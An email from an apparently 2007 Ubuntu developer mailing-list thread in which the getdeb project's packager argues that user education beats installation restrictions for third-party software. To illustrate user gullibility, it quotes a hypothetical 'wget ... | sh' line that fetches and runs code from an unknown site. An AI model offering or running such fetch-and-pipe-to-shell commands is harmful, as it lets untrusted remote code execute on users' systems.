Ian, in my opinion there is a major flaw on your assumptions. If someone is looking for an application "X" and find a site with: "To get this application just open a terminal and type: Please type: wget -O - <a href="http://best.forubuntu.com">http://best.forubuntu.com</a> | sh" . Trust me, a naive user will just do it, a power user which trusts that site, will also do it, maybe, but just maybe it will analyze the page contents. The issue here is not about the technical process involved, it is about trust. If you believe that making software installation more restrictive for such users will improve security. I believe It will fail. If PPAs availability increases there will be nasty people providing nasty packages, if you are concerned about naive users, then my first suggestion is to present an initial screen during Ubuntu install with: "If you add extra repositories or install .debs from the web, please make sure you are using a trusted source, otherwise you may get malicious software", if it is important enough, let's make it hard to accept, it is a simple text o read (1 line), there is no excuse for "next -> next". If the system will be used by other people, then it is his responsibility of the system administrator (installer) to pass the message or to configure the system on a safely manner (by not providing admin membership). The current main benefits of using trusted repositories are for those which are security aware, naive users do actually press "Install" regardless of the warning on potential malicious software caused by missing GPG signatures. Using trusted repositories provides an higher level of security, it does not enforce it, it is user's choice to enforce it. Now let me write a bit about the getdeb project. We are probably one of the youngest and major 3rd party software providers for Ubuntu, composed by a small team of Ubuntu/Debian and/or generic Linux and Open Source supporters. We do not use an APT repository because the tools required to provide software, using an easy and presentation extensible technology, with server side mirrors selection (for load balance and fail over) are not yet production ready. The ability to install applications from a browser using APT will be introduced in Gutsy, (apt url handler, and gapti) still they do not cover some of our usability concerns, the apt dynamic mirrors selection feature is still not fully implemented and needs more testing. On our specific case APT is strong requirement, we are providing >5000 packages and 100GBs of data per day. Our current success comes from the fact to we server both type of users, naive users which just need some new software and some newer version to support their latest gadget, or their latest web service, and power users, which have the skills to build from source packages but which do not have enough time to read the install instructions and install all the development packages for every software that they may need. Summarizing, I agree with you that it is our responsibility (Ubuntu community in general) to provide a safe computing environment, however in my humble opinion those should be pursued with user's education and meeting reasonable user's needs, and not just by adopting a "make it harder" sense of security for software installation. We can continue to discuss about getdeb, that would be something for another thread, my objective here was just to present my personal point of view regard your comments. Getdeb is presented as an example of a 3rd party software provider. We could not have a contractual obligation with Canonical because we are not a legal entity. Best regards, <div>2007/10/1, Ian Jackson <<a href="mailto:iwj@ubuntu.com">iwj@ubuntu.com</a>>:<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;"> João Pinto writes ("RE: Untrusted software and security click-through warnings"): > I agree with some of your points, but not with others, anyway your note was > a notification, not a request for comments. On the contrary: I'm not the person in Ubuntu who will make this decision. A policy matter like this one ought to be taken by the Technical Board. I was expressing my personal opinion. So, thanks for your reply and please do feel free to comment in detail. I'd be happy to talk about your project. ubuntu-devel-discuss would probably be the right list and I have set the Reply-To. Regards, Ian. </blockquote></div> -- João Pinto GetDeb Package Builder <a href="http://www.getdeb.net">http://www.getdeb.net</a>